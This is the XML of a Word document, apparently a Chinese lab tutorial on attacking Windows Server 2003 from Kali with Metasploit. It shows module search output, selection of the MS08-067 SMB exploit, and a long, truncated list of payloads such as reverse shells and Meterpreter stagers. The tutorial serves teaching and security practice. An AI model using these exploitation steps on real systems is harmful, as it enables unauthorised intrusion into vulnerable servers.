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38" w:rsidRDefault="000232E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用MSF来攻击windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server2003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击方：Kali2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受害者：Windows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2003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受害者IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r>
        <w:t>121.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>msf &gt; search netapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   Name                                 Disclosure Date  Rank    Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   ----                                 ---------------  ----    -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   exploit/windows/smb/ms03_049_netapi  2003-11-11       good    MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   exploit/windows/smb/ms06_040_netapi  2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   exploit/windows/smb/ms08_067_netapi  2008-10-28       great   MS08-067 Microsoft Server Service Relative Path Stack Corruption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r w:rsidRPr="000232E8">
        <w:t>msf &gt; use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">msf exploit(ms08_067_netapi) &gt; show payloads </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>Compatible Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t>===================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8"/>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   Name                                                Disclosure Date  Rank    Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   ----                                                ---------------  ----    -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   generic/custom                                                       normal  Custom Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   generic/debug_trap                                                   normal  Generic x86 Debug Trap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   generic/tight_loop                                                   normal  Generic x86 Tight Loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   windows/dllinject/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP Stager (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dllinject/reverse_winhttp                                    normal  Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/exec                                                         normal  Windows Execute Command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/format_all_drives                                            manual  Windows Drive Formatter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/loadlibrary                                                  normal  Windows LoadLibrary Path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/messagebox                                                   normal  Windows MessageBox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   windows/meterpreter/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_winhttp                                  normal  </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/meterpreter/reverse_winhttps                                 normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/bind_tcp                                    normal  Windows Inject DLL, Bind TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupdllinject/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/bind_hidden_tcp                           normal  Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/bind_ipv6_tcp                             normal  </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/bind_nonx_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/bind_tcp                                  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/bind_tcp_rc4                              normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/bind_tcp_uuid                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/reverse_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/reverse_ord_tcp                           normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/reverse_tcp                               normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/reverse_tcp_allports                      normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/reverse_tcp_dns                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/reverse_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/patchupmeterpreter/reverse_tcp_uuid                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000232E8" w:rsidRDefault="000232E8" w:rsidP="000232E8">
      <w:r>
        <w:t xml:space="preserve">   windows/shell/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager</w:t>
      </w:r>
    </w:p>
